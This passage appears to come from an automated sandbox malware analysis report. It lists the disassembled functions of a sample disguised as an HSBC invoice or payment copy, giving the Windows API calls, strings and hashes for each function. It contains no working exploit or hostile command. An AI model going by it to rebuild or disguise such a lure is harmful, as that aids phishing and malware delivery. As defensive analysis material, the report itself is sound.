                    • Opcode Fuzzy Hash: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                    • Instruction Fuzzy Hash: 5F415075904219AFCF14DFA4DC849AEBBB8FF08354F00906AF955E7761DB30A946CB90
                    Function 00EF5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000101,?), ref: 00EF5AA6
                    • inet_addr.WS2_32(?), ref: 00EF5AEB
                    • gethostbyname.WS2_32(?), ref: 00EF5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00EF5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF5C00
                    • WSACleanup.WS2_32 ref: 00EF5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 781e66688c48ac39ef653b40c9abccf713361dd2cf0b2cd980ed6f8abf3fb375
                    • Instruction ID: 1f88d0aa32f56145398357eb9838f7bc15d65a15214b2298d622238e7439387c
                    • Opcode Fuzzy Hash: 781e66688c48ac39ef653b40c9abccf713361dd2cf0b2cd980ed6f8abf3fb375
                    • Instruction Fuzzy Hash: 365181326047049FDB20AF24CC49B7AB7E4EF58714F149969F65AFB2A1DB70E804DB42
                    Function 00EEB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEB7B1
                    • GetLastError.KERNEL32 ref: 00EEB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                    • Instruction ID: 4ef3e7b4988b4627ba7c8799bd39876a346974160d30d815ed7e53b4373b9600
                    • Opcode Fuzzy Hash: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                    • Instruction Fuzzy Hash: E431C035A0024C9FDB10EFA6C885ABFB7B4FF48714F14512AE405E7291DB71D942DB41
                    Function 00ED9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ED94F6
                    • GetDlgCtrlID.USER32 ref: 00ED9501
                    • GetParent.USER32 ref: 00ED951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9520
                    • GetDlgCtrlID.USER32(?), ref: 00ED9529
                    • GetParent.USER32(?), ref: 00ED9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                    • Instruction ID: aaf28d3aa9866752c8f30eec28120043788f5c9a19a19a26ae1b793d504be227
                    • Opcode Fuzzy Hash: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                    • Instruction Fuzzy Hash: B621C474A00108BBCF15AF64CCC5DFEBBB4FF45310F101266B565A72A2DB75991ADB20
                    Function 00ED955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ED95DF
                    • GetDlgCtrlID.USER32 ref: 00ED95EA
                    • GetParent.USER32 ref: 00ED9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9609
                    • GetDlgCtrlID.USER32(?), ref: 00ED9612
                    • GetParent.USER32(?), ref: 00ED962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                    • Instruction ID: c5278392cc6f774ff478532acb6ddd642a22bde74be7b5aa1d5d056adfb92c30
                    • Opcode Fuzzy Hash: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                    • Instruction Fuzzy Hash: 8421F874A00108BBDF14AB60CCC5EFEBBB4FF44300F141156F561A72A2DB76955ADB20
                    Function 00ED9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 00ED9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00ED9666
                    • _wcscmp.LIBCMT ref: 00ED9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ED96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                    • Instruction ID: 7562a13592ebfbef5320c4dcc68d31da4c76f9d9a3a5e6066a37505703795f2d
                    • Opcode Fuzzy Hash: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                    • Instruction Fuzzy Hash: BC112336248307BAEA112630DC06DA6B7DCDB15334F201127F910B91E2FEE2E9426A59
                    Function 00EE4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 00EE419D
                    • __swprintf.LIBCMT ref: 00EE41AA
                      • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00EE41E0
                    • LockResource.KERNEL32(00000000), ref: 00EE41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00EE421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00EE422E
                    • LockResource.KERNEL32(?), ref: 00EE423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                    • Instruction ID: 988c4e552b307879c6b8a7d4bb46889d1d24a84a4f8f3223722391db45922dd2
                    • Opcode Fuzzy Hash: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                    • Instruction Fuzzy Hash: 1531B0B5A0525EABCB119FA1DD48EBF7BACFF09301F044565F901E61A0D730DA51ABA0
                    Function 00EE16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00EE1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00EE171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                    • Instruction ID: dc41ce19bd3f6a03feea2fa88934285415ba002dc09a4b1ff97ec1709abd003b
                    • Opcode Fuzzy Hash: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                    • Instruction Fuzzy Hash: 9431B47560034CBBDB21EF15DC84B6937A9AB1BB65F104056FC00E62A0D770AD889F90
                    Function 00E8FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E8FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00E8FCA5
                    • UnregisterHotKey.USER32(?), ref: 00E8FDFC
                    • DestroyWindow.USER32(?), ref: 00EC4A00
                    • FreeLibrary.KERNEL32(?), ref: 00EC4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC4A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                    • Instruction ID: a663c923887863b20051d080a4230a03e00b7d0aab834883261afac0b3d1669d
                    • Opcode Fuzzy Hash: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                    • Instruction Fuzzy Hash: 5BA158717012128FCB29EF14C5A5F69F7A4AF04704F1462ADE90EBB2A2DB31AD16CF54
                    Function 00EDA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,00EDAA64), ref: 00EDA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: 1236229f8af2195542c1982000d50acb567282090462a2e9ba1433f7e505523f
                    • Instruction ID: bdd5cfad724fd4c98f5f6a8c8d5a2389e5d2853583e1b8e56c4694b55134e366
                    • Opcode Fuzzy Hash: 1236229f8af2195542c1982000d50acb567282090462a2e9ba1433f7e505523f
                    • Instruction Fuzzy Hash: 9291C671900606DBCB08DF60C491BE9FBB5FF44314F18A12AE899B7241DF70AB5ADB91
                    Function 00E82E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E82EAE
                      • Part of subcall function 00E81DB3: GetClientRect.USER32(?,?), ref: 00E81DDC
                      • Part of subcall function 00E81DB3: GetWindowRect.USER32(?,?), ref: 00E81E1D
                      • Part of subcall function 00E81DB3: ScreenToClient.USER32(?,?), ref: 00E81E45
                    • GetDC.USER32 ref: 00EBCF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBCF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00EBCFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00EBCFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00EBCFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EBD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                    • Instruction ID: ffc4f60a85510c22d87aea4cf3cc4b477e8a11d0cf8d33941ee549567a630f03
                    • Opcode Fuzzy Hash: 694e9c6916c7a448efaa195a3ea674a0b6eb72cc2d44308848c04faf8eed026c
                    • Instruction Fuzzy Hash: 1971C530504209DFCF219F64CC80AFB7BB6FF49358F2452A9EE59B61A5D7318841EB61
                    Function 00EFF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EFF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EFFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EFFD90
                    • CloseHandle.KERNEL32(?), ref: 00EFFDBF
                    • CloseHandle.KERNEL32(?), ref: 00EFFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: 92040cb355e80aee7ec03be090153fbbd86830a09ef6ad5fbc51f3d26f59d537
                    • Instruction ID: 831285150a81f5312bb3ceebb1194a4331fef9db3f2ffa4c7b436364e2b20616
                    • Opcode Fuzzy Hash: 92040cb355e80aee7ec03be090153fbbd86830a09ef6ad5fbc51f3d26f59d537
                    • Instruction Fuzzy Hash: 52E1C3316043449FCB14EF24C891B7ABBE0BF89354F14946DF999AB2A2DB31EC45CB52
                    Function 00E8201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EBBEF6
                    • DeleteObject.GDI32(00000000), ref: 00EBBF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 2402799130-0
                    • Opcode ID: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                    • Instruction ID: 5f254e1f01d185b150094696bfb153aed2646903ae9ac48cd3387c63b2a3de51
                    • Opcode Fuzzy Hash: 06f5a44f93c4fe6e367aa1368a30ee1359b3f832795bc9a6c140f9c493f339e8
                    • Instruction Fuzzy Hash: 3761AF34200614DFDB35AF14DD48B7AB7F1FF52319F10652CE64AAA9A0C771A881EF51
                    Function 00EE4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                      • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00EE4FE2
                    • _wcscmp.LIBCMT ref: 00EE4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00EE5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
